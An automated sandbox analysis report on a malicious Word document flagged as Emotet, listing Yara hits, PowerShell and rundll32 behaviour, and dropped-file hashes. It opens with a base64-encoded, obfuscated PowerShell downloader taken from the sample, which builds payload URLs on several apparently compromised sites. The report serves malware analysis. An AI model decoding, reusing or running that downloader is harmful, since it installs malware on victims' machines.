QAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

24_2_10001630

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 00000014.00000002.2315698763.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2216468622.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2216501392.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2272217705.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2351060980.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2217285925.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2250563386.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2208899018.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2343132705.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2328304138.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2228390631.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2315683097.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2345794337.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2253405198.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2184720444.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2171985440.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2272239255.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2193942063.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2260117902.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2293149466.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2172275535.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2326497204.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2198337513.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2326554651.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2206030341.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2343180402.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2183134792.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2183096664.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2205979964.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2294420728.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2228409491.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2293169935.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2250329618.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2282637087.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2351041899.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2261000236.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2305216199.0000000000130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2230214108.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2305247507.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2179031474.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2239275661.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2193919576.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2260083486.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2283433880.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2318576557.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2351778015.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2239237660.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2275876666.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2306105928.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2282670574.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2240182511.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.300000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE

ID:	343897
Product:	CloudBasic
Start time:	18:39:16
Start date:	25.01.2021
Sample:	Mensaje-22-012021.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	5023f52efbf71865041baf66ae8411cb
SHA1:	dc2aabc9b019199d32c000a8e18e63cafa4fbfd3
SHA256:	f4f41ebd2b517564f8764fa21faa2b1a824694e29cb31a2f149245e7bd42ab24
Filetype:	Microsoft Word document (32009/1) 79.99%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{51E1E6FE-FC7D-43F0-B5EC-EA333295AFA3}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DFD62553-3B39-4424-842F-0904C3CEBA38}.tmp	data	7441DC2B308CCCA699850EA3301EF411	88175ECF2F2B60C85B6E91FB9685165ECD4E2A1F	27A92CEB09BC5358622DCDF1015A0C369E8C4AF6EF838B2450F05DD2151900FC
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Mensaje-22-012021.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Tue Jan 26 01:40:40 2021, length=169472, window=hide	B66DF24DB1A4F422A00793330B83B195	3A2DECDBC95A337172C24E70E9313304EAFB3E6B	043EDF5F3E8BA4642E208E8D97DFACB24AC3074EFBF9357CDDC8225FF7B9ED6D
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	1B34D9FDE85A5BC6CE047DEF3971FFAD	6849AD57B070DBCF7F452E98D1F3623330718995	B5C73D522CBF336789E5EF81A7EC5ADECA0112CDDA1E6F503C7BCABD959F1BA8
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	4A5DFFE330E8BBBF59615CB0C71B87BE	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2H6MO9GWQ13A7WY0W5E0.temp	data	48F72281BAAEF84031FBFA8EEB2920BA	558DE5636D881A0CEA20D93578A231B13801AEF1	CF8C8B174BA4A3C67C9DC93E6D1678035AE0C163B20EE5A126D0E62F92E7C963
C:\Users\user\Desktop\~$nsaje-22-012021.doc	data	4A5DFFE330E8BBBF59615CB0C71B87BE	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll	data	F0B8807DD850DB30EA70918CD87BB302	BAE31F0C5B9167AA4B82EAFE396725DD2429388F	707504760B76AA8D62C2B99C8884352CF94D11A50D2E1D63E5F0B4B615DBE58B

Analysis Report Mensaje-22-012021.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs